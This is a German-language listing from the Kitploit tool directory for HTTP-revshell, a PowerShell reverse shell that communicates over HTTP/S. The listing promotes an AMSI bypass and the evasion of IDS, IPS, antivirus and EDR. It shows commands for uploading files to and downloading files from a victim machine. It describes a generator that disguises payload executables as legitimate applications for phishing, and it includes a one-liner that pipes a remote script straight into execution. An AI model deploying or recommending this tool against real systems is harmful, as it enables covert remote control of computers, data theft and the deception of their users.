Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/3v4si0n/http-revshell
Phishing-ToolsPayload-GenerierungIDS/IPS-UmgehungPost-ExploitationCommand and ControlRed TeamingRemote-Access-Tool
GitHub3v4si0n/http-revshell

HTTP-revshell

Powershell Reverse Shell mit HTTP/S-Protokoll, AMSI-Umgehung und Proxy-Unterstützung

Repository anzeigen
5989012vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

PowerShell HTTP/S Reverse Shell

Category-tool Powershell Python License

HTTP-revshell ist ein Tool, das sich an Redteam-Übungen und Pentester richtet. Es stellt eine Reverse-Verbindung über das HTTP/S-Protokoll her und nutzt einen verdeckten Kanal, um die Kontrolle über das Opfergerät durch Webanfragen zu erlangen und so Lösungen wie IDS, IPS und AV zu umgehen.

HINWEIS: Das Tool wird hinsichtlich Umgehungstechniken nicht gewartet. Mit nur wenigen Änderungen können viele auf dem Markt erhältliche EDRs umgangen werden.

HTTP-revshell

Hilfe zu server.py

Serververwendung:

root@kitploit:~
usage: server.py [-h] [--ssl] [--autocomplete] host port

positional arguments:
  host            Listen Host
  port            Listen Port

optional arguments:
  -h, --help      show this help message and exit
  --ssl           Send traffic over ssl
  --autocomplete  Autocomplete powershell functions

Hilfe zu Invoke-WebRev.ps1 (Client)

Clientverwendung:

root@kitploit:~
Import-Module .\Invoke-WebRev.ps1
Invoke-WebRev -ip IP -port PORT [-ssl]

Installation

root@kitploit:~
git clone https://github.com/3v4Si0N/HTTP-revshell.git
cd HTTP-revshell/
pip3 install -r requirements.txt

Funktionen

  • SSL
  • Proxy-fähig
  • Dateien hochladen
  • Dateien herunterladen
  • PowerShell-Skripte über den Server laden
  • Fehlerkontrolle
  • AMSI-Bypass
  • Autocomplete für PowerShell-Funktionen (optional)

Verwendung der Zusatzfunktionen

Upload

Diese Funktion ermöglicht das Hochladen beliebiger Dateien auf das Opfergerät.

Verwendung:

root@kitploit:~
upload /src/path/file C:\dest\path\file

Download

Diese Funktion ermöglicht das Herunterladen einer Datei auf das Angreifer-Gerät.

Verwendung:

root@kitploit:~
download C:\src\path\file /dst/path/file

Loadps1

Diese Funktion ermöglicht das Laden von PowerShell-Skripten, ohne auf die Festplatte des Opfers schreiben zu müssen, indem die Datei über legitimen HTTP-Verkehr gelesen wird.

Verwendung:

root@kitploit:~
loadps1 /path/to/the/local/server/PowershellScript.ps1

Hilfe zu Revshell-Generator.ps1 (Automatischer Payload-Generator)

Dieses Skript ermöglicht die Erstellung einer ausführbaren Datei mit dem für HTTP-revshell notwendigen Payload. Folgen Sie einfach den Anweisungen auf dem Bildschirm, um ihn zu generieren. Es gibt 6 vordefinierte Vorlagen und eine anpassbare mit den gewünschten Daten.

Die vom Tool generierten Payloads enthalten das legitime Symbol der Anwendung sowie die Produkt- und Urheberrechtsinformationen der Originalanwendung. Darüber hinaus öffnet jeder von ihnen die Originalanwendung, bevor die Verbindung zum Server hergestellt wird, und gibt sich so als legitime Anwendung aus. Dies kann für Phishing- oder Red-Team-Übungen verwendet werden.

Verwendung des Payload-Generators:

root@kitploit:~
powershell "iwr -useb https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Revshell-Generator.ps1 | iex"

Revshell-Generator

WICHTIG: Alle Felder in den vordefinierten Vorlagen werden durch Drücken der Eingabetaste automatisch ausgefüllt.

Danksagungen

  • JoelGMSec für seinen großartigen Revshell-Generator.ps1. Twitter: @JoelGMSec
  • dev-2null für die Meldung des ersten Fehlers. Twitter: @dev2null

Haftungsausschluss & Lizenz

Dieses Skript ist unter LGPLv3+ lizenziert. Direkter Link zur Lizenz.

HTTP-revshell sollte nur für autorisierte Penetrationstests und/oder gemeinnützige Bildungszwecke verwendet werden. Jeglicher Missbrauch dieser Software liegt nicht in der Verantwortung des Autors oder anderer Mitarbeiter. Verwenden Sie es auf eigenen Servern und/oder mit Erlaubnis des Serverbesitzers.

Tool herunterladen